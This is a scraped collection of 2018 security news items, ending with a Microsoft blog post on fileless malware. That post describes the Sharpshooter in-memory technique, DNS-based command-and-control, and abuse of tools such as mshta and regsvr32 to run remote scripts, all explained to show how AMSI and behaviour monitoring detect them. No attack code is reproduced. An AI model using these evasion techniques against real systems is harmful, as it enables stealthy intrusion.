The District Court Judge further found that certain allegations failed to state claims. Specifically, the Court dismissed claims for: (1) negligence; (2) negligence per se; (3) violation of the Colorado Consumer Protection Act; (4) unjust enrichment; and (5) violation of the Illinois Uniform Deceptive Trade Practices Act. However, the following claims survived Chipotle’s dismissal efforts: (1) breach of implied contract; (2) fraudulent omission claims (under Arizona, California, and Illinois consumer protection laws); (3) violation of California’s Unfair Competition Law; and (4) various damages claims (under California, Illinois, and Missouri consumer protection laws).

View Court’s Order.

It only takes one data point to blow open a threat investigation

Because cybersecurity has been such a pain point for businesses, it’s easy to assume that threat investigations are difficult and unwieldy to manage. When you consider what’s at stake—customer data, sensitive company and client information, and the financial costs of responding to a breach—the prospect of threat hunting can seem overwhelming. But the truth is, attackers can be just as vulnerable as the businesses they target. They get sloppy. They overlook their own vulnerabilities and … More

The post It only takes one data point to blow open a threat investigation appeared first on Help Net Security.

True password behaviors in the workplace revealed

LastPass released the “2018 Global Password Security Report,” revealing true password behaviors in the workplace and creating a benchmark that businesses can use to measure progress when investing in password security tools. The report, which analyzed anonymized data in over 43,000 companies of all sizes, industries, and geographies using LastPass as their business password manager, draws a picture of password management for the business IT community. “Security professionals often fail to consider the value of … More

The post True password behaviors in the workplace revealed appeared first on Help Net Security.

SIE Europe: Data sharing initiative to combat cybercrime launches

SIE Europe emerged from stealth mode to launch an initiative to enable European organisations to contribute and share Internet data. This consortium advances the detection and mitigation of phishing, malware and other targeted cyberattacks against their networks. Deutsche Telekom AG, one of the world’s leading integrated telecommunications companies, and DCSO Deutsche Cyber-Sicherheitsorganisation GmbH, a competence center and managed security service provider for the German economy, have signed agreements with SIE Europe UG to participate in … More

The post SIE Europe: Data sharing initiative to combat cybercrime launches appeared first on Help Net Security.

McAfee’s Most Dangerous Celebrities Study 2018: Ruby Rose Takes Center Stage

Every rose has its thorn, right? Apparently, the same goes for actress Ruby Rose, as her newfound popularity from “Orange is the New Black” has made her both famous, and maybe even dangerous. At least when it comes to online interactions. You heard correctly, the newly announced Batwoman has also been crowned McAfee’s Most Dangerous Celebrity this year. For the twelfth year in a row, McAfee researched famous individuals to reveal the riskiest celebrity to search for online, or, which search results could expose fans to malicious sites. Ruby Rose took home the top spot in 2018, but curious about who the runner-ups are? Here’s the full list:

Recent popular reality and sitcom shows have driven some stars (Kristin Cavallari, Debra Messing, Kourtney Kardashian) to the top of our list. Which is one of the few reasons this list is so different than last year’s. Unlike 2017’s list of Most Dangerous Celebrities, musicians ranked low on this year’s list. Adele was the highest ranked musician at No. 21 followed by Shakira (No. 27), 2017’s top celebrity Avril Lavigne (No. 30), and Lady Gaga (No. 35).

So, whether you’re looking up what Ruby did on the latest “Orange is the New Black” episode, or what Kristin Cavallari wore the latest awards show, make sure you’re searching the internet safely. To keep your internet activity secure and danger-free, follow these tips:

  • Be careful what you click. Users looking for a sneak-peek of the CW series, Batwoman starring Ruby Rose should be cautious and only download directly from a reliable source. The safest thing to do is to wait for the official release instead of visiting a third-party website that could contain malware.
  • Apply system and application updates as soon as they are available. Very often the operating system and application updates include security fixes. Applying updates is an important step to help ensure devices stay protected.
  • Browse with security protection. McAfee Total Protection is a comprehensive security solution that can help keep devices protected against malware, phishing attacks, and other threats. It includes McAfee WebAdvisor which can help protect against going to malicious websites.
  • Use parental control software. Kids are fans of celebrities too, so ensure that limits are set on the child’s device and use software that can help minimize exposure to potentially malicious or inappropriate websites.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post McAfee’s Most Dangerous Celebrities Study 2018: Ruby Rose Takes Center Stage appeared first on McAfee Blogs.

McAfee Blogs: McAfee’s Most Dangerous Celebrities Study 2018: Ruby Rose Takes Center Stage

Every rose has its thorn, right? Apparently, the same goes for actress Ruby Rose, as her newfound popularity from “Orange is the New Black” has made her both famous, and maybe even dangerous. At least when it comes to online interactions. You heard correctly, the newly announced Batwoman has also been crowned McAfee’s Most Dangerous Celebrity this year. For the twelfth year in a row, McAfee researched famous individuals to reveal the riskiest celebrity to search for online, or, which search results could expose fans to malicious sites. Ruby Rose took home the top spot in 2018, but curious about who the runner-ups are? Here’s the full list:

Recent popular reality and sitcom shows have driven some stars (Kristin Cavallari, Debra Messing, Kourtney Kardashian) to the top of our list. Which is one of the few reasons this list is so different than last year’s. Unlike 2017’s list of Most Dangerous Celebrities, musicians ranked low on this year’s list. Adele was the highest ranked musician at No. 21 followed by Shakira (No. 27), 2017’s top celebrity Avril Lavigne (No. 30), and Lady Gaga (No. 35).

So, whether you’re looking up what Ruby did on the latest “Orange is the New Black” episode, or what Kristin Cavallari wore the latest awards show, make sure you’re searching the internet safely. To keep your internet activity secure and danger-free, follow these tips:

  • Be careful what you click. Users looking for a sneak-peek of the CW series, Batwoman starring Ruby Rose should be cautious and only download directly from a reliable source. The safest thing to do is to wait for the official release instead of visiting a third-party website that could contain malware.
  • Apply system and application updates as soon as they are available. Very often the operating system and application updates include security fixes. Applying updates is an important step to help ensure devices stay protected.
  • Browse with security protection. McAfee Total Protection is a comprehensive security solution that can help keep devices protected against malware, phishing attacks, and other threats. It includes McAfee WebAdvisor which can help protect against going to malicious websites.
  • Use parental control software. Kids are fans of celebrities too, so ensure that limits are set on the child’s device and use software that can help minimize exposure to potentially malicious or inappropriate websites.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post McAfee’s Most Dangerous Celebrities Study 2018: Ruby Rose Takes Center Stage appeared first on McAfee Blogs.



McAfee Blogs

Collaborate securely

This is a blog series that responds to common questions we receive from customers about deployment of Microsoft 365 security solutions. In this series youll find context, answers, and guidance for deployment and driving adoption within your organization. Check out Protecting user identities, the fourth blog in our eight-blog series on deploying Intelligent Security Scenarios.

Image taken at the Microsoft Ignite Conference.

Your users can create, edit, and share a single document securely, even when working with multiple stakeholders, both inside and outside of your company. With Microsoft security solutions, users can identify, classify, track, and protect documents to prevent leaks and block access by unauthorized readers. These security measures travel with the document, making it easy and much less risky for stakeholders to download files.

How can I make it easier for groups of people to securely work on the same document?

Provide a common, secure identity for your employees, by first importing their user identities into Azure Active Directory (Azure AD). Then integrate your on-premises directories with Azure AD using Azure AD Connect, which allows you to create a common, secure identity for your users for Microsoft Office 365, Azure, and thousands of other software as a service (SaaS) applications that are integrated with Azure AD.

To make it easy for your employees to work securely with users from other organizations, enable Azure AD B2B collaboration capabilities. Now you can provide access to documents, resources, and applications to your partners while maintaining complete control over your own corporate data (see Figure 1). For your customers, Azure AD B2C lets you build identities on Windows, Android, and iOS devices, or for the web, and allow your customers’ users to sign in with their existing social accounts or personal emails.

Infographic detailing Azure Active Directory security.

Figure 1. Azure AD B2B collaboration enables organizations using Azure AD to work securely with users from other organizations while maintaining control over their own corporate data.

How can I protect organizational data when my users view, edit, and share documents?

Azure Information Protection enables you to configure policies and label a document to control who can see, edit, or share it. For example, a user could apply a Confidential label to a sensitive document that would then prevent it from being shared externally. You can also track who opened a document and where, and then determine what that person can do with the document after its opened.

With Microsoft Data Loss Prevention (DLP) in Microsoft Exchange, you can take your information protection one step further and create rules that automatically identify sensitive content and apply the appropriate policy. For example, you can identify any document containing a credit card number thats stored in any OneDrive for Business site, or you can monitor just the OneDrive sites of specific people.

In addition to DLP, OneDrive for Business offers its own set of options for protecting and controlling the flow of organizational information. For example, you can block file syncing on unmanaged devices, audit actions on OneDrive for Business files, and use mobile device management policies to manage any device that connects to your organizations OneDrive for Business account. You can control as much or as little of your employee permissions as you need to.

How can I protect email?

The same Microsoft DLP capabilities above can be applied to email on Exchange Online to better control data in email and prevent accidental data leaks. Use Office 365 Message Encryption for email sent via Outlook.com, Yahoo!, Gmail, and other email services. Email message encryption helps you make sure that only intended recipients can view message content. Office 365 administrators can define message flow rules to determine the conditions for encryption. For example, a rule can require the encryption of all messages addressed to a specific recipient.

Deployment tips from our experts

Start by provisioning employee identities in Azure AD. Identity is the foundation for secure collaboration. Your first step is to import employee identities into Azure AD and then integrate your on-premises directories with Azure Active Directory using Azure AD Connect.

Collaborate securely with other organizations. With Azure AD B2B and Azure AD B2C capabilities, you can work securely with customers and partners.

Protect documents and emails. Help protect information through access control, classification, and labeling that extend to shared documents and external stakeholders with Azure Information Protection. Then define message flow rules in Office 365 Message Encryption to determine the conditions for email encryption.

Plan for success with Microsoft FastTrack. FastTrack comes with your subscription at no additional charge. Whether youre planning your initial rollout, needing to onboard your product, or driving user adoption, FastTrack is your benefit service that is ready to assist you. Get started at FastTrack for Microsoft 365.

Want to learn more?

For more information and guidance on this topic, check out the white paper Collaborate and share documents securely in real-time. You can find additional security resources on Microsoft.com.

Coming soon! Productive and Secure, the sixth installment of our Deploying Intelligent Scenarios series. In November, we will kick off a new series, Top 10 Security Deployment Actions with Microsoft 365 Security.

More blog posts from this series

The post Collaborate securely appeared first on Microsoft Secure.

Cyber Defense Magazine – October 2018 has arrived. Enjoy it!

Cyber Defense Magazine October 2018 Edition has arrived.

Sponsored by: Bosch

We hope you enjoy this month’s edition…packed with 100+ pages of excellent content.  InfoSec Knowledge is Power.  We have 6 years of eMagazines online with timeless content.  Visit our online library by clicking here.   Please tell your friends to

We hope you enjoy this month’s edition…packed with 100+ pages of excellent content.  InfoSec Knowledge is Power.  We have 6 years of eMagazines online with timeless content.  Visit our online library by clicking here.   Please tell your friends to

subscribe – no strings, always free emagazines:

CDM October Cyber Defense magazine

Our Global Awards are annually given out at the IPEXPO EUROPE Conference as a global event in Europe every year, Q4.  GLOBAL 2018 Awards – CLOSED!  Winners will be announced in just a few days and our Global Print Edition will be out on the 3rd of October and we’ll release an electronic edition as well…

Our InfoSec awards are annually given out at the RSA Conference in the United States every year, Q1.  USA 2019 Awards – OPENING SOON!

MAGAZINES        TV        AWARDS  with our upcoming platform coming soon….

Sincerely,
TEAM CDM
Cyber Defense Magazine

We are all things Cyber Defense.  Thank you to our amazing readership!

Don’t forget to visit www.cyberdefense.tv – watch, learn & grow.

Pierluigi Paganini

(Security Affairs – hacking, Cyber Defense Magazine)

The post Cyber Defense Magazine – October 2018 has arrived. Enjoy it! appeared first on Security Affairs.

A final call for replacing security certificates using Symantec roots

Help Net Security sat down with Jeremy Rowley, Executive Vice President of Product at DigiCert. He leads the company’s product development teams serving its emerging markets clients that require security solutions for the Internet of Things, U.S. federal healthcare exchange, advanced Wi-Fi and other innovative technology sectors. The stable release of Google Chrome 70 is coming up this month. This means that sites with remaining Symantec certificates will be flagged as untrusted. What does this … More

The post A final call for replacing security certificates using Symantec roots appeared first on Help Net Security.

Organizations need to shift strategies, adopt a proactive approach to cybersecurity

The cybersecurity market has reached a point whereby organisations need to shift their strategies and have a new, proactive approach to their cybersecurity, according to a report by 451 Research. Hurdles that organizations need to overcome to successfully shift their strategies These were identified as: A profusion of tools and data that complicates – and too often, frustrates – an effective strategy An over-reliance on people to resolve security issues, and the unsustainable business model … More

The post Organizations need to shift strategies, adopt a proactive approach to cybersecurity appeared first on Help Net Security.

Quantifying a firm’s security levels may strengthen security over time

Cyberattacks grow in prominence each and every day; in fact, 2017 was the worst year to-date for data breaches, with the number of cyber incidents targeting businesses nearly doubling from 2016 to 2017. Now, new research from the UBC Sauder School of Business has quantified the security levels of more than 1,200 Pan-Asian companies in order to determine whether increased awareness of one’s security levels leads to improved defense levels against cybercrime. The study found … More

The post Quantifying a firm’s security levels may strengthen security over time appeared first on Help Net Security.

Explosion of look-alike domains aims to steal sensitive data from online shoppers

Venafi released research on the explosion of look-alike domains, which are routinely used to steal sensitive data from online shoppers. Venafi’s research analyzed suspicious domains targeting the top 20 retailers in five key markets: the U.S., U.K., France, Germany and Australia. As the rate of online shopping increases, customers are being targeted through look-alike domains. Cyber attackers create these fake domains by substituting a few characters in the URLs. Because they point to malicious online … More

The post Explosion of look-alike domains aims to steal sensitive data from online shoppers appeared first on Help Net Security.

Crypto Market Update: Japan’s Self-Regulatory Group (JVCEA) Readying Tighter Rules on Digital Assets

A group of cryptocurrency exchange operators in Japan is readying to tighten up measures following recent cyber breach. Action follows reported hack earlier in the month; cryptocurrency exchange Zaif lost an estimated $59.67 million. Self-Regulatory Group Set To Tighten Rules The Japan Virtual Currency Exchange Association (JVCEA) is exploring new rules to safeguard against cyber […]

The post Crypto Market Update: Japan’s Self-Regulatory Group (JVCEA) Readying Tighter Rules on Digital Assets appeared first on Hacked: Hacking Finance.

#CyberAware: Will You Help Make the Internet a Safe Place for Families?

National Cyber Security Awareness MonthDon’t we all kinda secretly hope, even pretend, that our biggest fears are in the process of remedying themselves? Like believing that the police will know to stay close should we wander into a sketchy part of town. Or that our doors and windows will promptly self-lock should we forget to do so. Such a world would be ideal — and oh, so, peaceful — but it just isn’t reality. When it comes to making sure our families are safe we’ve got to be the ones to be aware, responsible, and take the needed action.

Our Shared Responsibility

This holds true in making the internet a safe place. As much as we’d like to pretend there’s a protective barrier between us and the bad guys online, there’s no single government entity that is solely responsible for securing the internet. Every individual must play his or her role in protecting their portion of cyberspace, including the devices and networks they use. And, that’s what October — National Cyber Security Awareness Month (NCSAM) — is all about.

At McAfee, we focus on these matters every day but this month especially, we are linking arms will safety organizations, bloggers, businesses, and YOU — parents, consumers, educators, and digital citizens — to zero in on ways we can all do our part to make the internet safe and secure for everyone. (Hey, sometimes the home team needs a huddle, right!?)

8 specific things you can do!

National Cyber Security Awareness Month

  1. Become a NCSAM Champion. The National Cyber Security Alliance (NCSAM) is encouraging everyone — individuals, schools, businesses, government organizations, universities — to sign up, take action, and make a difference in online safety and security. It’s free and simple to register. Once you sign up you will get an email with a toolbox packed with fun, shareable memes to post for #CyberAware October.
  2. Tap your social powers. Throughout October, share, share, share great content you discover. Use the hashtag #CyberAware, so the safety conversation reaches and inspires more people. Also, join the Twitter chat using the hashtag #ChatSTC each Thursday in October at 3 p.m., ET/Noon, PT. Learn, connect with other parents and safety pros, and chime in.National Cyber Security Awareness Month
  3. Hold a family tech talk. Be even more intentional this month. Learn and discuss suggestions from STOP. THINK. CONNECT.™ on how each family member can protect their devices and information.
  4. Print it and post it: Print out a STOP. THINK. CONNECT.™ tip sheet and display it in areas where family members spend time online.
  5. Understand and execute the basics. Information is awesome. But how much of that information do we truly put into action? Take 10 minutes to read 10 Tips to Stay Safe Online and another 10 minutes to make sure you take the time to install a firewall, strengthen your passwords, and make sure your home network as secure as it can be.National Cyber Security Awareness Month
  6. If you care — share! Send an email to friends and family informing them that October is National Cybersecurity Awareness Month and encourage them to visit staysafeonline.org for tips and resources.
  7. Turn on multi-factor authentication. Protect your financial, email and social media accounts with two-step authentication for passwords.
  8. Update, update, update! This overlooked but powerful way to shore up your devices is crucial. Update your software and turn on automatic updates to protect your home network and personal devices.

Isn’t it awesome to think that you aren’t alone in striving to keep your family’s digital life — and future — safe? A lot of people are working together during National Cyber Security Awareness Month to educate and be more proactive in blocking criminals online. Working together, no doubt, we’ll get there quicker and be able to create and enjoy a safer internet.

 

 

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her onTwitter @McAfee_Family. (Disclosures)

The post #CyberAware: Will You Help Make the Internet a Safe Place for Families? appeared first on McAfee Blogs.

NTIA Seeks Public Comment on Approach to Consumer Privacy with an Eye Toward Building Better Privacy Protections

On September 26, 2018, the U.S. Department of Commerce’s National Telecommunications and Information Administration (“NTIA”) announced that it is seeking public comments on a proposed approach to advancing consumer privacy. The approach is divided into two parts: (1) a set of desired user-centric privacy outcomes of organizational practices, including transparency, control, reasonable minimization (of data collection, storage length, use and sharing), security, access and correction, risk management and accountability; and (2) a set of high-level goals that describe the outlines of the ecosystem that should be created to provide those protections, including harmonizing the regulatory landscape, balancing legal clarity and the flexibility to innovate, ensuring comprehensive application, employing a risk and outcome-based approach, creating mechanisms for interoperability with international norms and frameworks, incentivizing privacy research, ensuring that the Federal Trade Commission has the resources and authority to enforce, and ensuring scalability.

The NTIA is specifically looking to the public to respond with comments on the following questions:

  • Are there other outcomes or goals that should be included, or outcomes or goals that should be expanded upon as separate items?
  • Are the descriptions for the outcomes and goals clear, or are there are any issues raised by how any of them are described?
  • Are there any risks that accompany the list of outcomes, the list of goals or the general approach taken?
  • Are there any aspects of the approach that could be implemented or enhanced through Executive action or non-regulatory actions, and if so, what actions?
  • Should further explorations be made regarding additional commercial data privacy-related issues, including any recommended focus and desired outcomes?
  • Are there any aspects of the approach that may be achieved by other means, such as through statutory changes?
  • Do any terms used in the approach require more precise definitions, including suggestions for better definitions and additional terms?
  • Do changes need to be made with regard to the FTC’s resources, processes and/or statutory authority?
  • If all or some of the outcomes or goals described in this approach were replicated by other countries, do you believe it would be easier for U.S. companies to provide goods and services in those countries?
  • Are there other ways to achieve U.S. leadership that are not included in the approach?
  • Are there any high-level goals in this approach that would be detrimental to achieving U.S. leadership?

Comments are due by October 26, 2018, and may be submitted by email. Additional information can be found in the Federal Register Notice.

Port of San Diego Suffers Ransomware Attack

The FBI and the U.S. Department of Homeland Security are investigating a ransomware attack that affected at least some of the information systems belonging to the Port of San Diego. Port officials first reported the attack on Tuesday. Port of San Diego CEO Randa Coniglio said in a written statement that its investigation of the […]… Read More

The post Port of San Diego Suffers Ransomware Attack appeared first on The State of Security.

Google Hacker Discloses New Linux Kernel Vulnerability and PoC Exploit

A cybersecurity researcher with Google Project Zero has released the details, and a proof-of-concept (PoC) exploit for a high severity vulnerability that exists in Linux kernel since kernel version 3.16 through 4.18.8. Discovered by white hat hacker Jann Horn, the kernel vulnerability (CVE-2018-17182) is a cache invalidation bug in the Linux memory management subsystem that leads to

Vulnerabilities and architectural considerations in industrial control systems

The reason SCADA security is so controversial stems primarily from the intense consequences that come from a compromise in this area. In this podcast, Andrew Ginter, VP of Industrial Security at Waterfall Security Solutions, and Edward Amoroso, CEO of TAG Cyber, talk about SCADA vulnerabilities in ICS architectures. Here’s a transcript of the podcast for your convenience. Andrew Ginter: Hello everyone. Thank you for joining us. I’m Andrew Ginter, the vice president industrial security at … More

The post Vulnerabilities and architectural considerations in industrial control systems appeared first on Help Net Security.

An investigation into how cyber ready businesses really are

The more cyber ready a business becomes, the better its overall business outcomes. Vodafone’s Cyber Ready Barometer notes 48% of cyber ready businesses are reporting more than 5% increases in annual revenue as well as high stakeholder trust levels. Despite this, the research also shows that only 24% of businesses globally could reasonably call themselves cyber ready. Cyber readiness, according to the report, is a mix of different measures including cyber operations, cyber strategies, cyber … More

The post An investigation into how cyber ready businesses really are appeared first on Help Net Security.

Organizations apply stronger PKI security controls due to their increasingly critical role

The Internet of Things is the fastest growing trend driving the deployment of applications that use public key infrastructure as evidenced by the Thales 2018 Global PKI Trends Study. The report, based on independent research by the Ponemon Institute, reveals continued and increased reliance on PKI as a core enterprise asset and a root of trust. Over the past few years, cloud applications, and now the IoT, are the newest disrupters to future PKI planning … More

The post Organizations apply stronger PKI security controls due to their increasingly critical role appeared first on Help Net Security.

16-Year-Old Boy Who Hacked Apple’s Private Systems Gets No Jail Time

An Australian teenager who pleaded guilty to break into Apple's private systems multiple times over several months and download some 90GB of secure files has avoided conviction and will not serve time in prison. An Australian Children's Court has given the now 19-year-old adult defendant, who was 16 at the time of committing the crime, a probation order of eight months, though the magistrate

Chronicle announces VirusTotal Enterprise with greater search and analysis capabilities

Chronicle, the cybersecurity subsidiary of Google’s parent company Alphabet, has announced VirusTotal Enterprise, which is aimed at helping enterprises protect their own networks. About VirusTotal Enterprise VirusTotal is a well-known website/online service that allows anyone to check whether a submitted file or URL is detected as malicious by a variety of antivirus products and website/domain scan engines. VirusTotal Enterprise will allow (paying) users to search for malware samples (using VT Intelligence), hunt for future malware … More

The post Chronicle announces VirusTotal Enterprise with greater search and analysis capabilities appeared first on Help Net Security.

Out of sight but not invisible: Defeating fileless malware with behavior monitoring, AMSI, and next-gen AV

Consider this scenario: Two never-before-seen, heavily obfuscated scripts manage to slip past file-based detection and dynamically load an info-stealing payload into memory. The scripts are part of a social engineering campaign that tricks potential victims into running the scripts, which use the file names install_flash_player.js and BME040429CB0_1446_FAC_20130812.XML.PDF.js, to distribute and run the payload.

The payload is sophisticated and particularly elusive, given that it:

  • Doesnt touch the disk, and does not trigger antivirus file scanning
  • Is loaded in the context of the legitimate process that executed the scripts (i.e., wscript.exe)
  • Leaves no traces on the disk, such that forensic analysis finds limited evidence

These are markers of a fileless threat. Still, Windows Defender Advanced Threat Protection (Windows Defender ATP) antivirus capabilities detect the payload, stopping the attack in its tracks. How is this possible?

In this scenario, Antimalware Scan Interface (AMSI) facilitates detection. AMSI is an open interface that allows antivirus solutions to inspect script behavior by exposing script contents in a form that is both unencrypted and unobfuscated.

AMSI is part of the range of dynamic next-gen features that enable antivirus capabilities in Windows Defender ATP to go beyond file scanning. These features, which also include behavior monitoring, memory scanning, and boot sector protection, catch a wide spectrum of threats, including new and unknown (like the two scripts described above), fileless threats (like the payload), and other sophisticated malware.

Generically detecting fileless techniques

The two aforementioned obfuscated scripts are actual malware detected and blocked in the wild by antivirus capabilities in Windows Defender ATP. Removing the first layer of obfuscation reveals a code that, while still partially obfuscated, showed some functions related to a fileless malware technique called Sharpshooter. We found the two scripts, which were variants of the same malware, not long after the Sharpshooter technique was documented and published by MDSec in 2017.

The Sharpshooter technique allows an attacker to use a script to execute a .NET binary directly from memory without ever needing to reside on the disk. This technique provides a framework that can enable attackers to easily repackage the same binary payload within a script. As demonstrated by the example of the two scripts, files that use the Sharpshooter technique can then be used in social engineering attacks to lure users into running the script to deliver a fileless payload.

Screenshot of obfuscated scriptFigure 1. Obfuscated code from install_flash_player.js script

Screenshot of the script which contains functions typically used in the Sharpshooter technique

Figure 2. After de-obfuscation, the script contains functions typically used in the Sharpshooter technique

When the Sharpshooter technique became public, we knew it was only a matter time before it would be used it in attacks. To protect customers from such attacks, we implemented a detection algorithm based on runtime activity rather than on the static script. In other words, the detection is effective against the Sharpshooter technique itself, thus against new and unknown threats that implement the technique. This is how Windows Defender ATP blocked the two malicious scripts at first sight, preventing the fileless payload from being loaded.

The detection algorithm leverages AMSI support in scripting engines and targets a generic malicious behavior (a fingerprint of the malicious fileless technique). Script engines have the capability to log the APIs called by a script at runtime. This API logging is dynamic and is therefore not hindered by obfuscation: a script can hide its code, but it cannot hide its behavior. The log can then be scanned by antivirus solutions via AMSI when certain dangerous APIs (i.e., triggers) are invoked.

This is the dynamic log generated by the scripts and detected by Windows Defender ATP at runtime via AMSI:

Screenshot of the dynamic AMSI log generated during the execution of the Sharpshooter techniqueFigure 3. Dynamic AMSI log generated during the execution of the Sharpshooter technique in the two malicious scripts

Using this AMSI-aided detection, Windows Defender ATP disrupted two distinct malware campaigns in June, as well as the steady hum of daily activities.

Windows Defender ATP telemetry shows two Sharpshooter campaigns in JuneFigure 4. Windows Defender ATP telemetry shows two Sharpshooter campaigns in June

Furthermore, generically detecting the Sharpshooter technique allowed us to discover a particularly sophisticated and interesting attack. Windows Defender ATPs endpoint and detection response capabilities caught a VBScript file that used the Sharpshooter technique.

Sample Windows Defender ATP alert showing how detection of the Sharpshooter technique by Windows Defender AV is surfaced in Windows Defender Security CenterFigure 5. Sample Windows Defender ATP alert showing how detection of the Sharpshooter technique by Windows Defender AV is surfaced in Windows Defender Security Center

We analyzed the script and extracted the fileless payload, a very stealthy .NET executable. The malware payload downloads data from its command-and-control (C&C) server via the TXT records of DNS queries. In particular, it downloads the initialization vector and decryption key necessary to decode the core of the malware. The said core is also fileless because its executed directly in memory without being written on the disk. Thus, this attack leveraged two fileless stages.

Screenshot showing that the core component of the malware is decrypted and executed from memoryFigure 6. The core component of the malware is decrypted and executed from memory

Our investigation into the incident turned up enough indicators for us to conclude that this was likely a penetration testing exercise or a test involving running actual malware, and not a real targeted attack.

Nonetheless, the use of fileless techniques and the covert network communication hidden in DNS queries make this malware similar in nature to sophisticated, real-world attacks. It also proved the effectiveness of the dynamic protection capabilities of Windows Defender ATP. In a previous blog post, we documented how such capabilities allow Windows Defender ATP to catch KRYPTON attacks and other high-profile malware.

Upward trend in fileless attacks and living off the land

Removing the need for files is the next progression of attacker techniques. Antivirus solutions have become very efficient in detecting malicious executables. Real-time protection gives visibility on each new file that lands on the disk. Furthermore, file activity leaves a trail of evidence that can be retrieved during forensic analysis. That’s why we are seeing an increase in attacks that use of malware with fileless techniques.

At a high level, a fileless malware runs its main payload directly in memory without having to drop the executable file on the disk first. This differs from traditional malware, where the payload always requires some initial executable or DLL to carry out its tasks. A common example is the Kovter malware, which stores its executable payload entirely in registry keys. Going fileless allows the attackers to avoid having to rely on physical files and improve stealth and persistence.

For attackers, building fileless attacks poses some challenges; in primis: how do you execute code if you don’t have a file? Attackers found an answer in the way they infect other components to achieve execution within these components environment. Such components are usually standard, legitimate tools that are present by default on a machine and whose functionality can be abused to accomplish malicious operations.

This technique is usually referred to as “living off the land”, as malware only uses resources already available in the operating system. An example is the Trojan:Win32/Holiks.A malware abusing the mshta.exe tool:

Trojan:Win32/Holiks.A is abusing mshta.exe to execute a script from command-lineFigure 7. Trojan:Win32/Holiks.A is abusing mshta.exe to execute a script from command-line

The malicious script resides only in the command line; it loads and executes further code from a registry key. The whole execution happens within the context of the mshta.exe process, which is a clean executable and tends to be trusted as a legitimate component of the operating system. Other similar tools, such as cmstp.exe, regsvr32.exe, powershell.exe, odbcconf.exe, rundll3.exe, just to name a few, have been abused by attackers. Of course, the execution is not limited to scripts; the tools may allow the execution of DLLs and executables, even from remote locations in some cases.

By living off the land, fileless malware can cover its tracks: no files are available to the antivirus for scanning and only legitimate processes are executed. Windows Defender ATP overcomes this challenge by monitoring the behavior of the system for anomalies or known patterns of malicious usage of legitimate tools. For example, Trojan:Win32/Powemet.A!attk is a generic behavior-based detection designed to prevent attacks that leverage the regsvr32.exe tool to run malicious scripts.

Antivirus capabilities Windows Defender ATP blocking legitimate regsvr32 tool abused to download and run a malicious remote scriptFigure 8. Antivirus capabilities in Windows Defender ATP blocking legitimate regsvr32 tool abused to download and run a malicious remote script

What exactly is fileless?

The term fileless suggests that a threat that does not come in a file, such as a backdoor that lives only in the memory of a machine. However, theres no generally accepted definition. The term is used broadly; its also used to describe malware families that do rely on files in order to operate. In the Sharpshooter example, while the payload itself is fileless, the entry point relies on scripts that need to be dropped on the targets machine and executed. This, too, is considered a fileless attack.

Given that attacks involve several stages for functionalities like execution, persistence, information theft, lateral movement, communication with command-and-control, etc., some parts of the attack chain may be fileless, while others may involve the filesystem in some form or another.

To shed light on this loaded term, we grouped fileless threats into different categories.

Taxonomy of fileless threats

Figure 9. Taxonomy of fileless threats

We can classify fileless threats by their entry point (i.e., execution/injection, exploit, hardware), then the form of entry point (e.g., file, script, etc.), and finally by the host of the infection (e.g., Flash, Java, documents).

From this classification, we can glean three big types of fileless threats based on how much fingerprint they may leave on infected machines.

  • Type I: No file activity performed. A completely fileless malware can be considered one that never requires writing a file on the disk.
  • Type II: No files written on disk, but some files are used indirectly. There are other ways that malware can achieve fileless presence on a machine without requiring significant engineering effort. Fileless malware of this type do not directly write files on the file system, but they can end up using files indirectly.
  • Type III: Files required to achieve fileless persistence. Some malware can have some sort of fileless persistence but not without using files in order to operate.

Having described the broad categories, we can now dig into the details and provide a breakdown of the infection hosts. This comprehensive classification covers the panorama of what is usually referred to as fileless malware. It drives our efforts to research and develop new protection features that neutralize classes of attacks and ensure malware does not get the upper hand in the arms race.

Exploits Hardware Execution or injection
  • File-based (Type III: executable, Flash, Java, documents)
  • Network-based (Type I)
  • Device-based (Type I: network card, hard disk)
  • CPU-based (Type I)
  • USB-based (Type I)
  • BIOS-based (Type I)
  • Hypervisor-based (Type I)
  • File-based (Type III: executables, DLLs, LNK files, scheduled tasks)
  • Macro-based (Type III: Office documents)
  • Script-based (Type II: file, service, registry, WMI repo, shell)
  • Disk-based (Type II: Boot Record)

For a detailed description and examples of these categories, visit this comprehensive page on fileless threats.

Defeating fileless malware with next-gen protection

File-based inspection is ineffective against fileless malware. Antivirus capabilities in Windows Defender ATP use defensive layers based on dynamic behavior and integrate with other Windows technologies to detect and terminate threat activity at runtime.

Windows Defender ATPs next-gen dynamic defenses have become of paramount importance in protecting customers from the increasingly sophisticated attacks that fileless malware exemplifies. In a previous blog post we described some of the offensive and defensive technologies related to fileless attacks and how these solutions help protect our customers. Evolving from the file-centric scanning model, Windows Defender ATP uses a generic and more powerful behavior-centric detection model to neutralize generic malicious behaviors and thus take out entire classes of attack.

AMSI

Antimalware Scan Interface (AMSI) is an open framework that applications can use to request antivirus scans of any data. Windows leverages AMSI extensively in JavaScript, VBScript, and PowerShell. In addition, Office 365 client applications integrates with AMSI, enabling antivirus and other security solutions to scan macros and other scripts at runtime to check for malicious behavior. In the example above, we have shown how AMSI can be a powerful weapon to fight fileless malware.

Windows Defender ATP has implemented AMSI provider and consumes all AMSI signals for protection, these signals are especially effective against obfuscation. It has led to the disruption of malware campaigns like Nemucod. During a recent investigation, we stumbled upon some malicious scripts that were heavily obfuscated. We collected three samples that were evading static signatures and are a mixture of barely recognizable script code and binary junk data.

Heavy obfuscation of three different samples of TrojanDownloader:Script/Nemucod.JACFigure 10. Heavy obfuscation of three different samples of TrojanDownloader:Script/Nemucod.JAC.

However, after manual de-obfuscation, it turned out that these samples decode and execute the same .js script payload, a known downloader:

A portion of the second stage downloader decrypted by Nemucod.JACFigure 11: A portion of the second stage downloader decrypted by Nemucod.JAC

The payload does not have any obfuscation and is very easy to detect, but it never touches the disk and so could evade file-based detection. However, the scripting engine is capable of intercepting the attempt to execute the decoded payload and ensuring that the payload is passed to the installed antivirus via AMSI for inspection. Windows Defender ATP has visibility on the real payload as its decoded at runtime and can easily recognize known patterns and block the attack before it deals any damage.

